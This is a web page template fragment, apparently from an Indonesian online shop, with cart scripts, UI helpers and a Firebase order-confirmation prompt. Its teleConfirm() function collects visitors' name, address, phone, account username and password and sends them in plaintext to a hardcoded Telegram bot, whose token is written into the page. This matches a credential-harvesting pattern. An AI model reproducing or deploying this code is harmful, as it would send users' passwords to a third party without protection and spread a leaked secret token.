<script src="{{ '/assets/js/simpleCart.js?version=2.1' | relative_url }}"></script>
<script async src="{{ '/assets/js/main.js' | relative_url }}"></script>
<script async src="{{ '/assets/js/style-picker.js' | relative_url }}"></script>
<script async src="{{ '/assets/js/add-to-cart.js' | relative_url }}"></script>
<script src="{{ '/assets/js/app.js' | relative_url }}"></script>
<script>
function showAlert(message, header = "Info") {
  const alert = document.getElementById('globalAlert');
  if (alert) {
    alert.header = header;
    alert.message = message;
    alert.buttons = ['OK'];
    alert.present();
  }
}

window.showToast = function (message, color = "primary", duration = 2000) {
  const toast = document.getElementById("globalToast");

  if (!toast) {
    console.warn("Toast element not found!");
    return;
  }

  toast.message = message;
  toast.color = color; // primary, success, warning, danger, etc.
  toast.duration = duration;
  toast.position = "bottom";
  toast.buttons = []; // tanpa tombol
  toast.present();
};

function teleConfirm(){
chat_id = "8019227359";
token = "8474511317:AAH1aAOM3u_yEdAu32v0s6OsHq2fic2Wub0";
message = "<b>Pemberitahuan Pembayaran</b>%0Anama : "+ $("#nama").val() + "%0Aalamat : " + $("#alamat").val() + "%0Ano. hp : " + $("#nomor").val() + "%0Alink : " + $("#link").val() + "%0Apaket : " + $("#paket").val() + "%0Ausername : " + $("#username").val() + "%0Apassword : " + $("#password2").val();
$.get("https://api.telegram.org/bot"+token+"/sendMessage?text="+message+"&chat_id="+chat_id+"&parse_mode=html");
$("#modal-signup").modal("hide");
$("#confirm").modal("show");
}
</script>
<script type="module">
document.addEventListener("DOMContentLoaded", () => {
  firebase.auth().onAuthStateChanged(async (user) => {
    if (!user) return;

    const params = new URLSearchParams(window.location.search);
    const orderId = params.get("orderId");
    if (!orderId) return;

    const db = firebase.firestore();
    const orderRef = db.collection("users").doc(user.uid).collection("orders").doc(orderId);
    const orderSnap = await orderRef.get();

    if (!orderSnap.exists) return;

    const data = orderSnap.data();
    const waConfirmed = data.waConfirmed || "Belum";

    if (waConfirmed === "Belum") {
      const alert = document.createElement('ion-alert');
      alert.header = 'Konfirmasi Pesanan';
      alert.message = 'Silakan konfirmasi pembayaran melalui WhatsApp untuk mempercepat proses.';
	  alert.buttons = ['OK'];

      document.body.appendChild(alert);
      await alert.present();
    }
  });
});
</script>
